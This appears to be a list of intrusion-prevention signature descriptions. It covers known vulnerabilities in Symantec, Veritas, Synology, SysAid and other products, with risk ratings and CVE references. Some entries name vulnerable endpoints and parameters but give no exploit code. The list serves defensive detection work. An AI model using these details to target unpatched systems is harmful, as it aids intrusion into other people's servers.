Symantec-Messaging-Gateway-Management-Console-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Symantec Messaging Gateway

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Messaging Gateway

Type:

Input Validation

Description:

A reflected Cross-Site Scripting vulnerability exists in Symantec Messaging Gateway Management Console. The vulnerability is due to insufficient input validation of the "displayTab" parameter. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary script code in the context of the affected user's browser session by enticing the user to visit a malicious page.

Situation:

HTTP_CSU-Messaging-Gateway-Management-Console-Cross-Site-Scripting

References:

CVE-2014-1648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1648

BID-66966
http://www.securityfocus.com/bid/66966

OSVDB-106171
http://www.osvdb.org/106171

Symantec-Messaging-Gateway-Performrestore-Command-Injection

About this vulnerability:

A vulnerability in Symantec Messaging Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-980-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Messaging Gateway

Type:

Input Validation

Description:

Improper handling of HTTP request parameters causes a command injection vulnerability in Symantec Messaging Gateway. A successful attack allows arbitrary commands to be executed on the target system with administrative privileges.

Situation:

HTTP_CRL-Symantec-Messaging-Gateway-Performrestore-Command-Injection

References:

CVE-2017-6327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6327

Symantec-Messaging-Gateway-Remote-Code-Execution

About this vulnerability:

A Symantec Messaging Gateway Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1025-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Symantec Messaging Gateway

Type:

Input Validation

Description:

A vulnerability in Symantec Messaging Gateway, versions 10.6.2-7, which allows remote attackers to execute arbitrary code due to improper validation to the backupNow.do endpoint.

Situation:

HTTP_CRL-Symantec-Messaging-Gateway-Remote-Code-Execution

References:

CVE-2017-6326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6326

Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery

About this vulnerability:

A Symantec Messaging Gateway Save.do Cross Site Request Forgery vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Messaging Gateway

Type:

Input Validation

Description:

A vulnerability in Symantec Messaging Gateway which allows remote attackers to add an administration user to the target system by getting a target user to view crafted web content, due to input validation errors when accepting user input.

Situation:

HTTP_CSH-Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery

References:

CVE-2012-0308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0308

Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Altiris Deployment Solution

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Altiris Deployment Solution; Symantec Altiris Notification Server; Symantec Management Platform

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in multiple Symantec products. The vulnerability is due to an error in the AeXNSConsoleUtilities.dll ActiveX control when processing overly long arguments passed to the BrowseAndSaveFile() method. This vulnerability can be exploited by remote attackers to execute arbitrary code on the target system by enticing the user into visiting a specially crafted web page. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
File-Text_Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow

References:

CVE-2009-3031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3031

BID-36698
http://www.securityfocus.com/bid/36698

Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Altiris Deployment Solution

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Altiris Deployment Solution; Symantec Altiris Notification Server; Symantec Management Platform

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in multiple Symantec products.

Situation:

HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
File-Text_Symantec-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow

References:

CVE-2009-3033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3033

BID-37092
http://www.securityfocus.com/bid/37092

OSVDB-60496
http://www.osvdb.org/60496

Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service

About this vulnerability:

A vulnerability in Symantec Gateway Security

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Gateway Security

Type:

Malfunction

Description:

There is a vulnerability in the way a component of multiple Symantec products processes ISAKMP messages. The vulnerability allows a malicious user to create a denial of service condition on the targeted service. When the target receives a malformed ISAKMP packet, a memory violation error will be triggered in the vulnerable isakmpd process which will result in the termination of the process. The isakmpd process will be restarted by the system after a short delay. Since there is a delay in the restart of the isakmpd service, an attacker repeatedly sending the malformed packet could cause a Denial of Service condition on the targeted service.

Situation:

Generic_UDP-Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service

References:

CVE-2004-0369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0369

BID-11039
http://www.securityfocus.com/bid/11039

Symantec-Multiple-Products-Vrtsweb-Code-Execution

About this vulnerability:

An input validation vulnerability in Symantec Veritas backup

Risk:

High

First detected in:

sgpkg-ips-289-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Backup Exec for Windows Server; Veritas Software NetBackup; Veritas Software BackUp Exec

Type:

Input Validation

Description:

There is an input validation vulnerability in multiple Symantec Veritas backup products that embed the VERITAS Web Server (VRTSweb) component. The flaw is due to a design weakness when processing requests sent to the target host on port TCP/14300. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in execution of arbitrary code within the security context of the SYSTEM user.

Situation:

Generic_CS-Symantec-Multiple-Products-Vrtsweb-Code-Execution

References:

CVE-2009-3027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3027

BID-37012
http://www.securityfocus.com/bid/37012

OSVDB-60884
http://www.osvdb.org/60884

Symantec-Norton-AntiVirus-Stack-Exhaustion

About this vulnerability:	A vulnerability in Symantec Norton AntiVirus
Risk:	Moderate
First detected in:	sgpkg-ips-357-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Symantec Norton AntiVirus
Type:	Buffer Overflow
Description:	A vulnerability has been reported in several Symantec products. One of the dynamic link libraries installed by the vulnerable product contains a remotely scriptable ActiveX object which lacks proper input data validation mechanisms. An attacker may instantiate the vulnerable object and supply malicious input data to its function to cause stack exhaustion.
Situation:	HTTP_SS-Symantec-Norton-AntiVirus-Stack-Exhaustion File-Text_Symantec-Norton-AntiVirus-Stack-Exhaustion

Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption

About this vulnerability:

A vulnerability in Symantec Norton AntiSpam

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Norton AntiSpam; Symantec Norton Internet Security; Symantec Norton Personal Firewall

Type:

Malfunction

Description:

The Symantec firewall product line is vulnerable to a remote heap corruption attack in the processing of a specially crafted NetBIOS Name Service Response message. If an attacker is able to send a UDP datagram with a source port of 137 to a vulnerable host, and the victim allows incoming UDP datagrams to destination UDP port 137, it is possible for the attacker to trigger a denial of service condition, or execute arbitrary code with kernel privileges. In a simple exploit case, the vulnerable system blue-screened with the error message "DRIVER_IRQL_NOT_LESS_OR_EQUAL" in symtdi.sys. However, if the exploit packet is properly crafted, it is possible for the remote attacker to manipulate the value for the internal heap memory block header. Then the attacker could control the memory location that the allocated for packet data. It is possible the attacker could write arbitrary code on to the specified heap memory location then run the codes of its own, with kernel privileges.

Situation:

Generic_UDP-Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption

References:

CVE-2004-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0444

BID-10335
http://www.securityfocus.com/bid/10335

OSVDB-6102
http://www.osvdb.org/6102

OSVDB-6101
http://www.osvdb.org/6101

OSVDB-6099
http://www.osvdb.org/6099

Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass

About this vulnerability:

Symantec Norton Internet Security 2006 COM Object Security Bypass

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Norton Internet Security

Type:

Malfunction

Description:

There is a vulnerability in Symantec Norton Internet Security 2006 that could allow a remote attacker to execute arbitrary code.

Situation:

File-Text_Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass-Vulnerability

References:

CVE-2006-3456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3456

BID-23822
http://www.securityfocus.com/bid/23822

OSVDB-35075
http://www.osvdb.org/35075

Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Symantec Norton Personal Firewall 2004 ActiveX Control Buffer Overflow

Risk:

Low

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Symantec Norton Personal Firewall; Symantec Norton Internet Security

Type:

Malfunction

Description:

A stack buffer overflow vulnerability exists in Symantec Norton Personal Firewall that could allow a remote attacker to execute arbitrary code on a vulnerable system.

Situation:

File-Text_Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-1689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1689

BID-23936
http://www.securityfocus.com/bid/23936

OSVDB-36164
http://www.osvdb.org/36164

Symantec-pcAnywhere-Buffer-Overflow

About this vulnerability:	A vulnerability in Symantec pcAnywhere
Risk:	High
First detected in:	sgpkg-ips-414-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Symantec pcAnywhere
Type:	Buffer Overflow
Description:	There exists a denial of service vulnerability in Symantec pcAnywhere. The vulnerability is caused due to improper boundary checking and can be exploited to cause a buffer overflow prior to authentication. A remote unauthenticated attacker can exploit the vulnerability to terminate the application, causing a denial of service condition.
Situation:	Generic_CS-Symantec-pcAnywhere-Buffer-Overflow

Symantec-pcAnywhere-Usage

About this vulnerability:	Symantec pcAnywhere usage
Risk:	Low
First detected in:	sgpkg-ips-276-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Symantec pcAnywhere
Type:	Remote Control
Description:	Symantec pcAnywhere is remote control application that allows sharing of desktop connections across machines. Use of this kind of applications may be considered a security risk in controlled environments.
Situation:	Generic_SS-Symantec-pcAnywhere-Server-Reply Generic_UDP-Symantec-pcAnywhere-Client-Name-Query Generic_UDP-Symantec-pcAnywhere-Client-Name-Reply

Symantec-Scan-Engine-Authentication-Bypass

About this vulnerability:

A Symantec Scan Engine Authentication Bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec AntiVirus Scan Engine

Type:

Configuration Error

Description:

A vulnerability in Symantec Scan Engine which allows remote attackers to change the administrator's password by sending an arbitrary password hash, due to the lack of a verification check in the server side authentication mechanism.

Situation:

HTTP_CRL-Symantec-Scan-Engine-Authentication-Bypass

References:

CVE-2006-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230

Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Veritas Dynamic Multi-Pathing (DMP)

Risk:

Moderate

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup; Symantec Veritas Storage Foundation

Type:

Buffer Overflow

Description:

Multiple buffer overflow vulnerabilities have been reported in Symantec's Veritas Administrator service, which is a component of multiple Symantec products, including variousStorage Foundation products. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted packets to the affected service. Successful exploitation of these vulnerabilities could result in execution of arbitrary code in the security context of the affected service (vxsvc), which is SYSTEM or root.

Situation:

Generic_CS-Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow

References:

CVE-2011-0547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0547

BID-49014
http://www.securityfocus.com/bid/49014

Symantec-Veritas-NetBackup-Command-Chaining

About this vulnerability:

A vulnerability in Symantec VERITAS NetBackup

Risk:

High

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Input Validation

Description:

There is a logic error in Symantec's VERITAS NetBackup products. The flaw is due to improper data validation of remotely received network messages. A remote authenticated attacker may exploit this vulnerability by appending malicious commands to a valid command, which could be executed on the target system with SYSTEM level privileges.

Situation:

Generic_Symantec-Veritas-NetBackup-Command-Chaining

References:

CVE-2006-4902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4902

BID-21565
http://www.securityfocus.com/bid/21565

Symantec-Veritas-NetBackup-Connect_Options-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Symantec VERITAS NetBackup

Risk:

High

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

Symantec VERITAS NetBackup has a buffer overflow vulnerability. By calling the vulnerable CONNECT_OPTIONS command with a crafted hostname parameter, a remote attacker can execute arbitrary code with System privileges.

Situation:

Generic_Symantec-Veritas-NetBackup-Connect-Option-Request-Buffer-Overflow

References:

CVE-2006-5822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5822

BID-21565
http://www.securityfocus.com/bid/21565

Symantec-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow

About this vulnerability:

Arbitrary code execution vulnerability in Symantec Veritas NetBackup Volume Manager Daemon

Risk:

Moderate

First detected in:

sgpkg-ips-122-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

Symantec VERITAS NetBackup Volume Manager Daemon suffers from a buffer overflow. Certain commands of the proprietary protocol used by the daemon are parsed incorrectly, leading to a buffer overflow. The vulnerability allows remote attackers to execute arbitrary code or cause a denial of service by crashing the service via a malformed protocol message using long strings as arguments.

Situation:

Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow

References:

CVE-2006-0989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0989

BID-17264
http://www.securityfocus.com/bid/17264

OSVDB-24172
http://www.osvdb.org/24172

Symantec-Veritas-Storage-Foundation-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Veritas Storage Foundation

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Veritas Storage Foundation

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Symantec Veritas Storage Foundation suite.

Situation:

Generic_UDP-Symantec-Veritas-Storage-Foundation-Buffer-Overflow

References:

CVE-2008-0638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0638

BID-25778
http://www.securityfocus.com/bid/25778

Symantec-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass

About this vulnerability:

A vulnerability in Symantec Veritas Storage Foundation for Windows

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Veritas Storage Foundation

Type:

Malfunction

Description:

A security bypass vulnerability exists in Symantec Veritas Storage Foundation Scheduler Service.

Situation:

Generic_SS-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass

References:

CVE-2008-3703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3703

BID-30596
http://www.securityfocus.com/bid/30596

Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-567-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Symantec Web Gateway. The vulnerability is due to an input validation error in blocklist.php. An attacker can exploit the vulnerability by enticing a user to click on a malicious link.

Situation:

HTTP_CSU-Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting

References:

CVE-2013-5013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5013

BID-65405
http://www.securityfocus.com/bid/65405

OSVDB-103144
http://www.osvdb.org/103144

Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

High

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

SQL Injection

Description:

There is a blind SQL injection vulnerability in Symantec Web Gateway. The vulnerability is due to a lack of proper sanitization of the id HTTP parameter passed to the blocked.php page. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP traffic to a vulnerable target server. A successful exploitation attempt could result in the execution of SQL commands, leading to information disclosure, a denial-of-service condition, or possibly other effects.

Situation:

HTTP_CSU-Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection

References:

CVE-2012-2574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2574

BID-54424
http://www.securityfocus.com/bid/54424

OSVDB-84118
http://www.osvdb.org/84118

Symantec-Web-Gateway-Dbutils.php-SQL-Injection

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

SQL Injection

Description:

An SQL injection vulnerability exists in Symantec Web Gateway. The vulnerability is due to lack of proper sanitization of the "hostname" HTTP parameter passed to some PHP pages. A remote, authenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the vulnerable target server. A successful exploitation attempt could result in the execution of SQL commands, leading to information disclosure, corruption of the database, a denial-of-service condition, corruption of the database, and possibly other effects.

Situation:

HTTP_CRL-Symantec-Web-Gateway-Dbutils.php-SQL-Injection

References:

CVE-2014-1651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1651

BID-67754
http://www.securityfocus.com/bid/67754

OSVDB-108183
http://www.osvdb.org/108183

Symantec-Web-Gateway-Input-Validation-Vulnerability

About this vulnerability:

An input validation vulnerability in Symantec Web Gateway file-management scripts.

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

An input validation vulnerability in the file-management scripts of Symantec Web Gateway, 5.0.x before 5.0.3, allow remote attackers to upload arbitrary code to a designated path and possibly execute this code.

Situation:

HTTP_CS-Symantec-Web-Gateway-Input-Validation-Vulnerability

References:

CVE-2012-0299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0299

BID-53443
http://www.securityfocus.com/bid/53443

OSVDB-82025
http://www.osvdb.org/82025

Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

High

First detected in:

sgpkg-ips-456-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

There is a remote command execution vulnerability in Symantec Web Gateway. The vulnerability is due to improper input validation. Remote, unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary PHP script code or shell command in the context of the affected server.

Situation:

HTTP_CSU-Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution

References:

CVE-2012-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297

BID-53444
http://www.securityfocus.com/bid/53444

OSVDB-82023
http://www.osvdb.org/82023

Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in Symantec Web Gateway. The vulnerability is due to improper validation of "variable[]", "operator[]", "other[]" and "operand[]" parameters of several php pages including but not limited to "entSummary.php", "custom_report.php", "host_spy_report.php" and "repairedclients.php" pages. An attacker can exploit this vulnerability by enticing a user to click on a malicious link. A successful attack will result in execution of arbitrary script code in the context of the affected user's browser session.

Situation:

HTTP_CRL-Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting

References:

CVE-2014-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1652

BID-67755
http://www.securityfocus.com/bid/67755

OSVDB-108184
http://www.osvdb.org/108184

Symantec-Web-Gateway-OS-Command-Injection

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

High

First detected in:

sgpkg-ips-635-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

A command injection vulnerability exists in Symantec Web Gateway. The vulnerability is due to insufficient input validation by existing application scripts accessible though the SWG console's interface. A remote authenticated attacker can leverage this vulnerability to inject and execute commands with SYSTEM privileges.

Situation:

HTTP_CSH-Symantec-Web-Gateway-OS-Command-Injection

References:

CVE-2014-7285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7285

BID-71620
http://www.securityfocus.com/bid/71620

OSVDB-116009
http://www.osvdb.org/116009

Symantec-Web-Gateway-OS-Command-Injection-CVE-2016-5313

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-812-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

Insufficient validation of request parameters causes a command injection vulnerability in Symantec Web Gateway. A successful exploitation can allow an attacer to run arbitrary code on the target system.

Situation:

HTTP_CRL-Symantec-Web-Gateway-OS-Command-Injection

References:

CVE-2016-5313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5313

Symantec-Web-Gateway-Pbcontrol.php-Command-Injection

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-474-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

There is a remote command execution vulnerability in Symantec Web Gateway. The vulnerability is due to improper input validation in pbcontrol.php. Remote, unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary commands in the security context of the affected server.

Situation:

HTTP_CRL-Symantec-Web-Gateway-Pbcontrol.php-Command-Injection

References:

CVE-2012-2953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2953

BID-54426
http://www.securityfocus.com/bid/54426

OSVDB-84120
http://www.osvdb.org/84120

Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities

About this vulnerability:

A vulnerability in Symantec Web Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-455-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Web Gateway

Type:

Input Validation

Description:

Multiple cross-site scripting (XSS) vulnerabilities have been discovered in Symantec's Web Gateway management console. The vulnerabilities are due to input validation errors in various parameters passed to timer.php. An unauthenticated, remote attacker can exploit these vulnerabilities by enticing a target user to access a crafted URL or perform a crafted HTTP request. A successful attack attempt could result in the execution of arbitrary script code in the target user's browser in the security context of the vulnerable web interface.

Situation:

HTTP_CRL-Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities

References:

CVE-2012-0296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0296

BID-53396
http://www.securityfocus.com/bid/53396

OSVDB-82022
http://www.osvdb.org/82022

Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Symantec Workspace Streaming

Risk:

Moderate

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Workspace Streaming

Type:

Malfunction

Description:

An arbitrary file upload vulnerability exists in Symantec Workspace. The vulnerability is due to lack of access control validation in the functionality used to process XMLRPC requests. A remote unauthenticated attacker could exploit this vulnerability by a sending specially crafted XML-RPC request to the server. Successful exploitation could lead to unauthorized access to sensitive server-side files and functionality. Further exploitation could lead to code execution in the security context of the application through the use of arbitrary file upload.

Situation:

HTTP_CS-Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload

References:

CVE-2014-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1649

BID-67189
http://www.securityfocus.com/bid/67189

OSVDB-106923
http://www.osvdb.org/106923

Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution

About this vulnerability:

An attempt to exploit a vulnerability in a Microchip SyncServer module detected

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Linux

Software:

Microchip SyncServer

Type:

Input Validation

Description:

A vulnerability in Microchip SyncServer timekeeping modules which allows remote attackers to execute arbitrary code, due to insufficient input validation.

Situation:

HTTP_CRL-Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution

References:

CVE-2022-40022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40022

Syncovery-For-Linux-Web-GUI-Authenticated-RCE

About this vulnerability:

A vulnerability in Syncovery File Sync & Backup Software for Linux.

Risk:

High

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Linux

Software:

Syncovery

Type:

Insecure Configuration

Description:

A vulnerability in Syncovery File Sync & Backup Software for Linux, versions before v9.48j, which allows remote attackers to execute arbitrary code on the target server by authenticating with a default password, giving the attcker the ability to create jobs which are executed before/after a profile is run, executed as root.

Situation:

HTTP_CRL-Syncovery-For-Linux-Web-GUI-Authenticated-RCE

References:

CVE-2022-36534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36534

Synergy-Clipboard-Integer-Overflow

About this vulnerability:	etected an attempt to exploit an integer overflow vulnerability in Synergy screen sharing application
Risk:	High
First detected in:	sgpkg-ips-494-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Synergy
Type:	Integer Overflow
Description:	A vulnerability exists in the clipboard functionality of Synergy screen sharing application. Presenting a large integer for the "format" field of DCLP request (set clipboard), it is possible to override a pointer in application memory. This vulnerability can be used for Denial of Service or potential remote code execution.
Situation:	Generic_CS-Synergy-Clipboard-Integer-Overflow

Synology-DiskStation-Manager-Command-Execution

About this vulnerability:

A Synology DiskStation Manager Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Synology

Type:

Remote Control

Description:

A vulnerability in Synology DiskStation Manager, versions 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1, which allows remote attackers to append data to arbitrary files and execute arbitrary code via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header.

Situation:

HTTP_CS-Synology-DiskStation-Manager-Command-Execution

References:

CVE-2013-6955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6955

OSVDB-101247
http://www.osvdb.org/101247

Synology-DiskStation-Manager-smart.cgi-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Synology Appliance

Risk:

High

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

Synology

Type:

Input Validation

Description:

There exists a vulberability in Synology, versions before 5.2-5967-5, which allows remote attacker to execute arbitrary system commands in webman/modules/StorageManager/smart.cgi due to the insufficient user input validation to the disk parameter.

Situation:

HTTP_CRL-Synology-DiskStation-Manager-smart.cgi-RCE

References:

CVE-2017-15889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15889

Synology-Safeaccess-SQL-Injection

About this vulnerability:

A vulnerability in Synology SafeAccess

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Synology

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Synology SafeAccess. An unauthenticated attacker can use this vulnerability to execute arbitrary SQL commands via a maliciously crafted domain parameter value.

Situation:

HTTP_CRL-Synology-Safeaccess-SQL-Injection

References:

CVE-2020-27660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27660

SysAid-Help-Desk-Administrator-Account-Creation

About this vulnerability:

A SysAid Help Desk Administrator Account Creation vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SysAid

Type:

Insecure Configuration

Description:

A vulnerability in SysAid, versions before 15.2, which allows remote attackers to create Administrator accounts via /createnewaccount and write to arbitrary files via the fileName parameter to /userentry.

Situation:

HTTP_CSU-SysAid-Help-Desk-Administrator-Account-Creation

References:

CVE-2015-2993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2993

